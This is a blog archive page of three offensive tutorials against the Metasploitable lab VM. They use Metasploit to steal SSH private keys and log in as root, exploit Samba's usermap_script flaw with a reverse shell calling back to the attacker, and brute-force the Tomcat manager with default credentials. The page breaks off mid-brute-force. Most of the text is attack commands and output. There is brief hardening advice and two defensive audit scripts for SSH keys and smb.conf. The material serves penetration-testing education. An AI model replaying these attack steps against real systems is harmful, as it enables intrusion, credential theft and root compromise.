Showing posts with label metasploitable. Show all posts

Saturday, May 18, 2013

Hey folks!

I had already forgotten about the Metasploitable posts, but I'm going back to them, because one of the posts I intend to write is how to do a complete vulnerability audit and report, and for that I'm auditing this VM. The interesting thing about this post is that I searched everywhere for the module I used and found nothing. Even the Metasploit site itself doesn't have much information about it, so here is one more piece of exclusive Brutal Security content :D

I don't think this is really a vulnerability, because to use this module I already need an open Metasploit session with the target, but it isn't a totally useless module either. So let's get to it!

Basically there are several ways to connect to a computer remotely. Over SSH we can use the traditional username and password, or we can use a key-based scheme. These keys are files kept on the server and on the client; when a connection is requested, the client's key is checked against the one the server trusts, which authenticates the user and grants remote access to the machine. I won't go deep into keys because that's LPI material and there will probably be a post about it.

This module works as follows: with a session already open we run the module and steal these keys; after that we put everything in the right places and can connect over SSH at any time without knowing the password.

So let's go! First we need an open session with the target. I won't explain that here; if you're using Metasploitable there are thousands of holes you can use to get there, so figure it out. :)

I already have Metasploit running here with an open session:

[*] The port used by the backdoor bind listener is already open
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (10.0.0.5:33290 -> 10.0.0.6:6200) at 2013-04-08 00:32:12 -0300

Now let's put this session in the background with CTRL + Z and load the module:
msf > search openssh
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/local/trusted_service_path 2001-10-25 00:00:00 UTC excellent Windows Service Trusted Path Privilege Escalation
post/multi/gather/ssh_creds normal Multi Gather OpenSSH PKI Credentials Collection
msf > use post/multi/gather/ssh_creds
This module has just one parameter, SESSION, where you tell it which Metasploit session to collect the credentials from.
msf post(ssh_creds) > set SESSION 1
SESSION => 1
msf post(ssh_creds) > exploit
[*] Finding .ssh directories
[*] Looting 3 directories
[+] Downloaded /home/msfadmin/.ssh/authorized_keys -> /root/.msf4/loot/20130408003303_default_10.0.0.6_ssh.authorized_k_435099.txt
[+] Downloaded /home/msfadmin/.ssh/id_rsa -> /root/.msf4/loot/20130408003304_default_10.0.0.6_ssh.id_rsa_734052.txt
[*] Saving private key id_rsa as cred
[+] Downloaded /home/msfadmin/.ssh/id_rsa.pub -> /root/.msf4/loot/20130408003304_default_10.0.0.6_ssh.id_rsa.pub_477962.txt
[+] Downloaded /home/user/.ssh/id_dsa -> /root/.msf4/loot/20130408003305_default_10.0.0.6_ssh.id_dsa_894228.txt
[*] Saving private key id_dsa as cred
[+] Downloaded /home/user/.ssh/id_dsa.pub -> /root/.msf4/loot/20130408003305_default_10.0.0.6_ssh.id_dsa.pub_587787.txt
[+] Downloaded /root/.ssh/authorized_keys -> /root/.msf4/loot/20130408003306_default_10.0.0.6_ssh.authorized_k_892925.txt
[+] Downloaded /root/.ssh/known_hosts -> /root/.msf4/loot/20130408003306_default_10.0.0.6_ssh.known_hosts_898232.txt
[*] Post module execution completed
msf post(ssh_creds) > exit -y

As you can see, we got some files from the target, but they're in the wrong folder and with crazy names. What we need to do now is fix the names and put them in the right folder, which is /root/.ssh on your BackTrack or whatever distro you use. The correct file names are in the command's own output: the path after "Downloaded" in each line is the original file on the target. You could skip the keys from the home directories, but to make sure it works I copied everything. So let's rename them and move them to the right place:

root@bt:~# cd /root/.msf4/loot
root@bt:~/.msf4/loot# ls
20130408003303_default_10.0.0.6_ssh.authorized_k_435099.txt
20130408003304_default_10.0.0.6_ssh.id_rsa_734052.txt
20130408003304_default_10.0.0.6_ssh.id_rsa.pub_477962.txt
20130408003305_default_10.0.0.6_ssh.id_dsa_894228.txt
20130408003305_default_10.0.0.6_ssh.id_dsa.pub_587787.txt
20130408003306_default_10.0.0.6_ssh.authorized_k_892925.txt
20130408003306_default_10.0.0.6_ssh.known_hosts_898232.txt
root@bt:~/.msf4/loot# mv 20130408003303_default_10.0.0.6_ssh.authorized_k_435099.txt /root/.ssh/authorized_keys
root@bt:~/.msf4/loot# mv 20130408003304_default_10.0.0.6_ssh.id_rsa_734052.txt /root/.ssh/id_rsa
root@bt:~/.msf4/loot# mv 20130408003304_default_10.0.0.6_ssh.id_rsa.pub_477962.txt /root/.ssh/id_rsa.pub
root@bt:~/.msf4/loot# mv 20130408003305_default_10.0.0.6_ssh.id_dsa_894228.txt /root/.ssh/id_dsa
root@bt:~/.msf4/loot# mv 20130408003305_default_10.0.0.6_ssh.id_dsa.pub_587787.txt /root/.ssh/id_dsa.pub
root@bt:~/.msf4/loot# mv 20130408003306_default_10.0.0.6_ssh.authorized_k_892925.txt /root/.ssh/authorized_keys
root@bt:~/.msf4/loot# mv 20130408003306_default_10.0.0.6_ssh.known_hosts_898232.txt /root/.ssh/known_hosts

Now that everything is in place, just connect over SSH! If you replaced everything correctly you'll have root access to the target over SSH:

root@bt:~/.msf4/loot# ssh root@10.0.0.6
The authenticity of host '10.0.0.6 (10.0.0.6)' can't be established.
RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.0.0.6' (RSA) to the list of known hosts.
Last login: Sun Apr 7 23:26:44 2013 from 10.0.0.5
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~# w
23:36:07 up 1:12, 2 users, load average: 0.01, 0.02, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 :0.0 22:24 1:12 0.01s 0.01s -bash
root pts/1 10.0.0.5 23:36 0.00s 0.01s 0.00s w
root@metasploitable:~# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root@metasploitable:~# exit
logout
Connection to 10.0.0.6 closed.

And that's it! Now it's up to you. In my opinion, accessing over SSH makes less noise and is simpler than keeping a Metasploit session open all the time, whether through a backdoor or something else.

The fix for this key problem is to keep your system always up to date, so that another flaw can't be exploited the way I did in this tutorial, to use a strong password or key passphrase, and to rotate your access keys frequently.
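As an added defender-side check, not part of the original post: the script below (my code, not the blog's) audits a .ssh directory for the two things the ssh_creds run above profited from, private keys stored without a passphrase and key files readable by other users, and counts authorized_keys entries. It understands both the legacy PEM header and the openssh-key-v1 container; the openssh-key-v1 sample it builds is a constructed header with no real key material.

```python
"""Audit a .ssh directory for unencrypted private keys and loose permissions."""
import base64
import os
import stat
import struct
import tempfile
from pathlib import Path

MAGIC = b"openssh-key-v1\x00"
LEGACY_HEADERS = {"-----BEGIN RSA PRIVATE KEY-----",
                  "-----BEGIN DSA PRIVATE KEY-----",
                  "-----BEGIN EC PRIVATE KEY-----"}
OPENSSH_HEADER = "-----BEGIN OPENSSH PRIVATE KEY-----"


def ssh_string(b):
    """Length-prefixed string as used inside openssh-key-v1 blobs."""
    return struct.pack(">I", len(b)) + b


def read_ssh_string(buf, off):
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n


def classify_private_key(text):
    """Return 'encrypted', 'unencrypted', or None if the text is not a private key."""
    lines = text.strip().splitlines()
    if not lines:
        return None
    if lines[0] in LEGACY_HEADERS:
        # Passphrase-protected PEM keys carry a "Proc-Type: 4,ENCRYPTED" header.
        return "encrypted" if "Proc-Type: 4,ENCRYPTED" in text else "unencrypted"
    if lines[0] == OPENSSH_HEADER:
        body = "".join(l for l in lines[1:] if not l.startswith("-----"))
        blob = base64.b64decode(body)
        if not blob.startswith(MAGIC):
            return None
        # Layout: magic, ciphername, kdfname, kdfoptions, nkeys, ...
        cipher, _ = read_ssh_string(blob, len(MAGIC))
        return "unencrypted" if cipher == b"none" else "encrypted"
    return None


def audit_ssh_dir(ssh_dir):
    """Return (finding, path) tuples; an empty list means nothing to report."""
    ssh_dir = Path(ssh_dir)
    findings = []
    if stat.S_IMODE(ssh_dir.stat().st_mode) & 0o077:
        findings.append(("dir_readable_by_others", str(ssh_dir)))
    for f in sorted(ssh_dir.iterdir()):
        if not f.is_file():
            continue
        mode = stat.S_IMODE(f.stat().st_mode)
        try:
            kind = classify_private_key(f.read_text(errors="replace"))
        except (ValueError, struct.error):
            kind = None  # malformed base64 or truncated blob: not a parseable key
        if kind == "unencrypted":
            findings.append(("unencrypted_private_key", str(f)))
        if kind is not None and mode & 0o077:
            findings.append(("private_key_readable_by_others", str(f)))
        if f.name == "authorized_keys":
            entries = [l for l in f.read_text().splitlines()
                       if l.strip() and not l.startswith("#")]
            findings.append((f"authorized_keys_entries:{len(entries)}", str(f)))
    return findings


def fake_openssh_key(cipher):
    """Constructed openssh-key-v1 header (no key material) for the demo below."""
    blob = (MAGIC + ssh_string(cipher) + ssh_string(b"none")
            + ssh_string(b"") + struct.pack(">I", 1))
    b64 = base64.b64encode(blob).decode()
    return f"{OPENSSH_HEADER}\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


def build_demo_dir():
    """Constructed sample mirroring the files the post downloads from the target."""
    d = Path(tempfile.mkdtemp()) / ".ssh"
    d.mkdir(mode=0o700)
    (d / "id_rsa").write_text(fake_openssh_key(b"none"))   # no passphrase
    os.chmod(d / "id_rsa", 0o644)                           # and world-readable
    (d / "id_dsa").write_text("-----BEGIN DSA PRIVATE KEY-----\n"
                              "Proc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,00\n\n"
                              "AAAA\n-----END DSA PRIVATE KEY-----\n")
    os.chmod(d / "id_dsa", 0o600)
    (d / "authorized_keys").write_text("# constructed sample\n"
                                       "ssh-rsa AAAAB3... msfadmin@host\n"
                                       "ssh-rsa AAAAB3... backup@host\n")
    os.chmod(d / "authorized_keys", 0o600)
    return d


if __name__ == "__main__":
    for finding, path in audit_ssh_dir(build_demo_dir()):
        print(f"{finding:35} {path}")
```

Run it against a real ~/.ssh to see which keys an attacker with a shell could reuse without a passphrase.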

That's it from me, happy studying!

Tuesday, May 14, 2013

Hi again!

Here's another post in our "Exploiting Metasploitable" series. In this post we'll exploit a vulnerability in Samba and use it to get root access to the system.

What will we need?

  • A victim running a vulnerable version of Samba
  • A pentest distro with the Metasploit Framework
  • Nmap or another port scanner

Locating the target

First of all, let's find where on the network the victim is. For that we'll use nmap:

attacker@blackoutlabs:~# nmap -sV 192.168.0.1/24

One of the results should look like this:


Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-09-11 19:18 BRT
Nmap scan report for 192.168.0.100
Host is up (0.0014s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:45:2C:E8 (Cadmus Computer Systems)
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.87 seconds


We can see Samba running on port 139 and on 445 (the lines I had highlighted in red). Yes, the same ports as the famous ms08_067_netapi, which exploits a vulnerability in the same service, but only on Windows XP (I've heard rumours of people succeeding on Windows Vista/7).


Exploiting

With the IP in hand, let's start Metasploit and look for our exploit.

attacker@blackoutlabs:~# msfconsole

       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 938 exploits - 501 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

msf > search samba

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
exploit/freebsd/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (*BSD x86)
exploit/linux/samba/chain_reply 2010-06-16 00:00:00 UTC good Samba chain_reply Memory Corruption (Linux x86)
exploit/linux/samba/lsa_transnames_heap 2007-05-14 00:00:00 UTC good Samba lsa_io_trans_names Heap Overflow
exploit/linux/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (Linux x86)
exploit/multi/samba/nttrans 2003-04-07 00:00:00 UTC average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
exploit/multi/samba/usermap_script 2007-05-14 00:00:00 UTC excellent Samba "username map script" Command Execution
exploit/osx/samba/lsa_transnames_heap 2007-05-14 00:00:00 UTC average Samba lsa_io_trans_names Heap Overflow
exploit/osx/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (Mac OS X PPC)
exploit/solaris/samba/lsa_transnames_heap 2007-05-14 00:00:00 UTC average Samba lsa_io_trans_names Heap Overflow
exploit/solaris/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (Solaris SPARC)
exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 00:00:00 UTC excellent Citrix Access Gateway Command Execution
exploit/windows/http/sambar6_search_results 2003-06-21 00:00:00 UTC normal Sambar 6 Search Results Buffer Overflow
exploit/windows/license/calicclnt_getconfig 2005-03-02 00:00:00 UTC average Computer Associates License Client GETCONFIG Overflow
post/linux/gather/enum_configs normal Linux Gather Configurations


Again, we'll use the module I had highlighted in red (exploit/multi/samba/usermap_script) and look at its options:


msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port
Exploit target:

Id Name
-- ----
0 Automatic

You can see the exploit is extremely simple: we only need to give the victim's IP and port, plus the attacker's (in the payload, further on). Let's fill in that information and run the exploit to see what happens...


msf exploit(usermap_script) > set RHOST 192.168.0.100
RHOST => 192.168.0.100

msf exploit(usermap_script) > set RPORT 445
RPORT => 445

msf exploit(usermap_script) > show payloads

Compatible Payloads
===================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd)
cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat -e)
cmd/unix/bind_netcat_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat -e)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_python normal Unix Command Shell, Reverse TCP (via Python)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)

msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse

msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.0.100 yes The target address
RPORT 445 yes The target port
Payload options (cmd/unix/reverse):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:

Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > set LHOST 192.168.0.106
LHOST => 192.168.0.106
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Y9MlnoVTPC9oq8TG;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Y9MlnoVTPC9oq8TG\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.0.106:4444 -> 192.168.0.100:51565) at 2012-09-11 19:20:41 -0300

ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:45:2c:e8
inet addr:192.168.0.100 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe45:2ce8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3127 errors:0 dropped:0 overruns:0 frame:0
TX packets:2306 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:216601 (211.5 KB) TX bytes:154677 (151.0 KB)
Interrupt:16 Base address:0xd020

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:94 errors:0 dropped:0 overruns:0 frame:0
TX packets:94 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:47217 (46.1 KB) TX bytes:47217 (46.1 KB)

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

id
uid=0(root) gid=0(root)

whoami
root

OWNED!!!
sh: OWNED!!!: not found


And there it is. I ran a few commands to confirm I was on the machine and to make sure I was root.


Avoiding the attack
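As an added defender-side check, not part of the original post: the module used above is described by Metasploit as 'Samba "username map script" Command Execution', and that name is the smb.conf directive whose value Samba runs as an external command with the client-supplied username. The script below (my code, not the blog's or Samba's) parses an smb.conf and flags that directive in [global]; both configuration samples are constructed, not Metasploitable's own file.

```python
"""Flag smb.conf settings that hand client-controlled input to a shell."""
import re

# Directives in [global] whose value is executed as an external command.
# "username map script" is the one named in the usermap_script module
# description: Samba runs it with the client-supplied username as argument.
RISKY_GLOBAL_DIRECTIVES = {
    "username map script": "runs a shell command with the client-supplied username",
}


def normalise_key(key):
    """smb.conf keys are case-insensitive and ignore interior whitespace."""
    return re.sub(r"\s+", " ", key.strip().lower())


def parse_smb_conf(text):
    """Parse smb.conf into {section: {key: value}}; ';' and '#' start comment lines."""
    sections = {}
    current = None
    pending = ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):            # smb.conf line continuation
            pending = line[:-1]
            continue
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][normalise_key(key)] = value.strip()
    return sections


def audit_smb_conf(text):
    """Return (directive, value, reason) for each risky directive set in [global]."""
    conf = parse_smb_conf(text)
    g = conf.get("global", {})
    return [(k, g[k], why) for k, why in RISKY_GLOBAL_DIRECTIVES.items() if k in g]


# Constructed sample resembling a weak lab configuration.
WEAK_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server
   ; legacy mapping hook left behind by an admin
   username map script = /etc/samba/scripts/mapusers.sh
[homes]
   comment = Home Directories
   browseable = no
"""

# Same file with the hook removed; the Samba package itself still needs updating.
HARDENED_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server
   # username map script removed; a static 'username map' file does not run commands
   username map = /etc/samba/smbusers
[homes]
   comment = Home Directories
   browseable = no
"""

if __name__ == "__main__":
    for directive, value, why in audit_smb_conf(WEAK_SMB_CONF):
        print(f"[!] {directive} = {value}: {why}")
    print("hardened:", audit_smb_conf(HARDENED_SMB_CONF) or "no findings")
```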

Hello everyone!

I'm starting a series of tutorials here teaching how to exploit some of the most common flaws, for people who are just starting out. If you followed the post on how to set up a lab, you probably have a Linux distro called Metasploitable.

We'll use its flaws in this series. Today's vulnerability is in Apache Tomcat 5.5.

Before we go exploiting everything, let's first understand what we're attacking.

Apache Tomcat is a collaborative open source project written in Java, and its job is to be a Java web server. The vulnerability we'll exploit here can be found in several versions, among them 5.5, which is running on Metasploitable.

What will we need?

  • A victim running a vulnerable version of Apache Tomcat
  • A pentest distro with the Metasploit Framework
  • A good wordlist
  • nmap or any other port scanner

Locating the target

Before going out exploiting everything in sight, let's do a quick reconnaissance of the terrain. To find the server we'll use nmap. First let's do a ping scan to see how many hosts are on the network.

attacker@blackoutlabs:~# nmap -sP 192.168.0.1/24

Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24 20:06 BRT
Nmap scan report for 192.168.0.1
Host is up (0.0028s latency).
MAC Address: 00:1E:58:C2:96:0B (D-Link)
Nmap scan report for 192.168.0.100
Host is up (0.065s latency).
MAC Address: D8:A2:5E:8D:BA:AF (Apple)
Nmap scan report for 192.168.0.101
Host is up (0.066s latency).
MAC Address: 1C:4B:D6:4F:C7:3D (AzureWave)
Nmap scan report for 192.168.0.104
Host is up (0.15s latency).
MAC Address: 0C:74:C2:BA:CE:51 (Apple)
Nmap scan report for 192.168.0.105
Host is up (0.071s latency).
MAC Address: A4:D1:D2:0C:EF:F5 (Apple)
Nmap scan report for 192.168.0.106
Host is up.
Nmap scan report for 192.168.0.107
Host is up (0.00050s latency).
MAC Address: C8:9C:DC:44:FC:6A (Elitegroup Computer System CO.)
Nmap scan report for 192.168.0.108
Host is up (0.00048s latency).
MAC Address: 08:00:27:45:2C:E8 (Cadmus Computer Systems)
Nmap scan report for 192.168.0.109
Host is up (0.055s latency).
MAC Address: E8:11:32:AD:57:9D (Samsung Electronics Co.)
Nmap done: 256 IP addresses (9 hosts up) scanned in 4.68 seconds


Whoa, lots of PCs, the whole lab is on.

So now what? Which one will be our target?

Again with nmap, let's scan the IPs until we find our target.


attacker@blackoutlabs:~# nmap -A 192.168.0.108

Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24 20:05 BRT
Nmap scan report for 192.168.0.108
Host is up (0.00062s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17 14:07:45
|_Not valid after: 2010-04-16 14:07:45
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
|_http-title: Site doesn't have a title (text/html).
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
|_http-favicon: Apache Tomcat
MAC Address: 08:00:27:45:2C:E8 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.9 - 2.6.31
Network Distance: 1 hop
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2012-08-24 20:06:02 UTC-4

TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms 192.168.0.108

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.20 seconds


Looks like we found it! It wasn't on the first try, it took me a little while to find it hehe...

Now we have some interesting information. We have Apache Tomcat 5.5 running on port 8180 (remember that). Done! Now that we know where it is, let's play with it a bit.

Exploiting

To exploit this service we'll use the Metasploit Framework and look for an exploit for Tomcat.


attacker@blackoutlabs:~# msfconsole


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post]
+ -- --=[ 251 payloads - 28 encoders - 8 nops]

msf> search tomcat
Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access
auxiliary/admin/http/tomcat_utf8_traversal normal Tomcat UTF-8 Directory Traversal Vulnerability
auxiliary/admin/http/trendmicro_dlp_traversal normal TrendMicro Data Loss Prevention 5.5 Directory Traversal
auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 00:00:00 UTC normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS
auxiliary/dos/http/hashcollision_dos 2011-12-28 00:00:00 UTC normal Hashtable Collisions
auxiliary/scanner/http/tomcat_enum normal Apache Tomcat User Enumeration
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 00:00:00 UTC excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution


We have some interesting modules here. We'll use tomcat_mgr_login to run a brute force: before breaking in we need a valid user/pass.


msf> use auxiliary/scanner/http/tomcat_mgr_login
msf (tomcat_mgr_login)> show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
URI /manager/html yes URI for Manager login. Default is /manager/html
USERNAME no A specific username to authenticate as
USERPASS_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host


Well, this module needs quite a few things. We'll add the host we found earlier and the port (remember which one it was? Always pay attention to that); if it doesn't find anything with the default users and passwords we'll add our own wordlists in PASS_FILE and USER_FILE, and if the default directory isn't found we'll need to change URI as well.


msf (tomcat_mgr_login) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false
msf (tomcat_mgr_login) > set RHOSTS 192.168.0.108
RHOSTS => 192.168.0.108
msf (tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf (tomcat_mgr_login) > exploit

[*] 192.168.0.108:8180 TOMCAT_MGR - [01/45] - Trying username:'admin' with password:'admin'
[-] 192.168.0.108:8180 TOMCAT_MGR - [01/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.0.108:8180 TOMCAT_MGR - [02/45] - Trying username:'manager' with password:'manager'
[-] 192.168.0.108:8180 TOMCAT_MGR - [02/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.0.108:8180 TOMCAT_MGR - [03/45] - Trying username:'role1' with password:'role1'
[-] 192.168.0.108:8180 TOMCAT_MGR - [03/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.0.108:8180 TOMCAT_MGR - [04/45] - Trying username:'root' with password:'root'
[-] 192.168.0.108:8180 TOMCAT_MGR - [04/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [05/45] - Trying username:'tomcat' with password:'tomcat'
[+] http://192.168.0.108:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] 192.168.0.108:8180 TOMCAT_MGR - [06/45] - Trying username:'both' with password:'both'
[-] 192.168.0.108:8180 TOMCAT_MGR - [06/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.0.108:8180 TOMCAT_MGR - [07/45] - Trying username:'j2deployer' with password:'j2deployer'
